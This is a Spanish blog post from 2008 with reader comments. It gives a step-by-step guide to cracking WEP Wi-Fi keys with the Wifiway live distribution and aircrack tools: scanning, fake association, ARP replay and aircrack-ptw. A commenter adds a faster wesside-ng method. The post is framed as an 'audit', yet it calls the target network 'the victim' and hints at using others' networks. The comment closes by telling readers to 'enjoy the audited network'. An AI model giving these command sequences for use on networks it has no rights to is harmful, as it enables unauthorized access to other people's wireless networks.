jueves, 22 de mayo de 2008

Auditoria WEP con Gategay MX6937m y Wifiway 0.8

Manual auditorias WEP Wifiway 0.8

Escribo este manual para platicarles sobre mi experiencia en Wifiway 0.8, usando mi laptop Gateway MX6937M, Wireless IPW3945ABG.

Lo básico para las auditorias WEP es:

***Wifiway (distro de Linux para auditorias o para ser más claros, para hacer hack las redes wireless).
Link: http://www.wifiway.org/sp/descarga.html
Descargar la versión 0.8 ya que con la que trabajaremos.

***Una laptop con tarjeta IPW3945ABG
En mi caso yo tengo una laptop Gateway MX6937m con esa tarjeta de red.

***Una señal wifi cercana de preferencia para practicar usa la de algún amigo etc.
(Usa tu imaginación :)

Bueno tratare de ser lo más claro con esto, y los guiare de la mano con todo los detalles que pueda. Así que empezaremos por paso.

1.- Tienes que arrancar tu imagen de CD en tu laptop ojo en esta parte por que para
usuarios de una gateway MX6937m no les arrancar la imagen, así que tendrán
que hacer esto

Cuando arranque y les muestre el primer menú de todo, si ya han tenido
experiencia en alguna distro live CD ya sabrá de que hablo, ok hagan esto
presionen la tecla TAB y les aparecerá hacia abajo unas letras y al final
de estas escriban irqpoll y le dan enter.

2.- Ya en la distro después que se cargo todo.
Abrimos una consola.
Hacemos:

airodump-ng wifi0



Con esto escaneamos las redes mas cercanas y veremos las señales wifi, con esto
seleccionamos a la rede de la victima y paramos el proceso con Ctrl+c.

3.- Abrimos otra pestaña o otra consola
Hacemos:

ipw3945.sh

este es un script necesario nos pedirá el canal "CH" de la victima, el rate de
captura que sera 2 y al final la BSSID.

4.- En esta etapa crearemos el archivo que contendrá nuestro paquete de capturas
y abrimos otro pestaña.

Hacemos:

airodump-ng -c 6 -w Mipaquetes wifi0

NOTA: pequeña esplicacion de la sintaxis

airodump-ng -c "aquivalaCHdelavictima" -w "cualquiernombreparaelarchivo" wifi0

5.- Hacer la Asociación con la señal wifi.

Hacemos:

aireplay -1 0 -a 00:1A:5C:6A:95:69 -h 00:37:RE:98:HC:2E -e 2WIRE341 wifi0

NOTA: pequeña explicación de la sintaxis
aireplay -1 0 -a BSSID -h TUMAC -e ESSID wifi0

BSSID: es la BSSID de la victima lo puedes ver al principio en el paso 2
ESSID: también ver el paso 2

Para saber tu MAC haces en otra consola esto

ifconfig

Veras unos numero como estos 00-11-22-33-44-55-00-00-00-.....
Solo necesitaras los primeros pares de 6 numeros ok y cambias las "-" por ":"
quedara algo asi 00:11:22:33:44:55

Si consigues la autentificación veras algo parecido a esto:



wifiway:~# aireplay -1 0 -a BSSID -h TUMAC -e ESSID wifi0
18:50:17 Enviando petición de autentificación
18:50:17 Autentificación conseguida
18:50:17 Enviando petición de asociación
18:50:22 Enviando petición de autentificación
18:50:23 Autentificación conseguida
18:50:23 Enviando petición de asociación
18:50:26 Asociación conseguida :-)
wifiway:~#

6.- Después de asociar

Hacemos:

aireplay -3 -b BSSID -h TUMAC wifi0

Y empezaras a ver algo parecido a esto.

wifiway:~# aireplay-ng -3 -b BSSID -h TUMAC wifi0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 1 packets (got 0 ARP requests), sent 0 packets...



Cuando veas que las ARP empiezan a subir quiere decir que todo fue un éxito y
Empezaras a ver algo así

wifiway:~# aireplay-ng -3 -b BSSID -h TUMAC wifi0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 2345 ARP requests), sent 1305 packets...

NOTA: Solo es un ejemplo para que sepas si lo estas haciendo bien, claro que a ti
te saldrán otro numero etc..

Después de paso unos 10 minutos y a ver conseguido una DATA de 100000 podrás ejecutar el paso final

7.- Aircrack
Hacen en una cosola nueva:

ls

Veras varios archivos o unos 3 para ser mas exactos, si recuerdas en el paso 4 creamos un archivo llamado Mipaquetes, bueno ahora lo encontraremos con el nombre de Mipaquetes-01.cap, así como esta el nombre hacemos esto:

aircrack-ptw Mispaquetes-01.cap



Si los DATA's fueron suficiente te mandara esto al final de 5 seg.

Found key with len 05: aqui estara la clave :)

4 comentarios:

Anna dijo...

hola, al poner wifi0 me da un error de network, me puedes dar alguna solucion?

Anónimo dijo...

Tu tarjeta es incompatible

Carelocoloco XD dijo...

Hola aqui esta lo que tiene que hacer Anna
1 abrir una consola (terminal o como le digas)
2 escribir:
iwconfig
con esto vas a ver el nombre de tu dispositivo wireless, es donde aparezcan mas cosas. Por ejemplo la mia es wlan0.
Para empezar este tutorial esta muy mal
faltan muchas especificaciones y cosas que una persona que lo haga por primera no sabe.
Asi que yo pondre la forma mas rapida que conozco y con un proceso automatizado para realizar una auditoria a una red inalambrica con clave WEP (posiblemente tambien sirva para WAP),yo lo realice con una lap gateway mt3423 que tiene un tarjeta wireles realtek 8185 y Wifiway 1.0 Final que lo puedes descar en esta URL http://www.wifiway.org/sp/descarga.html
La informacion importante para lograr este asunto es
1 WLAN (Wireless Local Area Network)
2 ND (Nombre de tu Dispositivo de red inalambrica)
3 BSSID (que es como la direccion de la wlan)
4 ESSID (este el nombre de la wlan)
5 CH (este es el canal por el que en el que esta la wlan)
RECUERDA QUE siempre que que aparezca algo de lo de arribe lo vas a sustituir por la informacion que tu tienes ya sea tu ND, el BSSID de la wlan o lo que fuese
Lo que tienes que hacer para realizar una auditoria ya estando en Wifiway/Linux es:
1 abrir una consola (terminal o como le digas)
2 escribir:
iwconfig
con esto vas a ver el nombre de tu dispositivo wireless, es donde aparezcan mas cosas. Por ejemplo la mia es wlan0.
3 escribir:
airodump-ng (ND)
esto es para ver la informacion de wlan que va a hacer la auditoria(obtener contraseña),y si es que existen redes cerca de tu ubicacion va a empezar a aparecer informacion de las wlan disponibles.
4 Espera unos 5 minutos, selecciona la wlan que gustes, yo te recomiendo que sea la que tiene mas "Beacons" estan enseguida de los BSSID y estan aumentado pasado el tiempo, anota el BSSID, CH y ESSID
5 Aplasta "Ctrl + C" (Control y la tecla "c") esto parar el escaneo de airodump
6 Escribe:
airmon-ng start wlan0 CH
IMPORTANTE!!! Vas a sustituir CH por el canal que anotaste de la wlan deseada.Con esto pusiste tu ND para que obtenga mas informacion y mas rapido de la wlan, tambien se le llama a esta info paquetes(packets o algo asi en ingles), que sirven desencriptar la clave wep o wap(no lo he probado con ninguna de este tipo).
7 Escribe:
airodump-ng (ND) -c (CH) (BSSID)
Ahora aparecera una informacion muy parecida a la de del primer codigo de airodump solo que aho podremos ver la recpcion de señal que es en donde dice RX.
8 Haz que el RX sea el mayor de todos los que aperecen en la pestaña o consola anterior, esto lo puedes hacer moviendo tu laptop o si tienes antena para tu wlan redireccionandola para donde creas que viene la señal, el RX debe ser muy alto para consiga rapido los paquetes necesarios para descriptar la clave WEP
9 Abre otra consola u otra pestaña, y escribe:
wesside-ng -i (ND)
Ahora empezara a salir mucha informacion de procesos y en unos pocos minutos (si no es que en menos de uno, como fue en mi primer auditoria) aparecera algo que dice: KEY (aqui la contraseña de la wlan)
10 Anota la KEY obtenida, reinicia con tu OS y a disfrutar de la red auditada jejeje XD
si tiene alguna duda agradecimiento, tirada de madre o lo que necesiten pueden escribirme a carelocoloco@hotmail.com y entonces les doy mi msn para ayudarles en directo.

By Carelocoloco XD

Livio dijo...

Hoal, gracias por la informacion
mira me sale esto y la verdad no se cuando detenerme, por que segun piden una cantidad de DATA pero no las veo por ningun lado

Read 312871 packets (got 12028 ARP requests and 288846 ACKs), sent 364681 packets...(499 pps)


gracias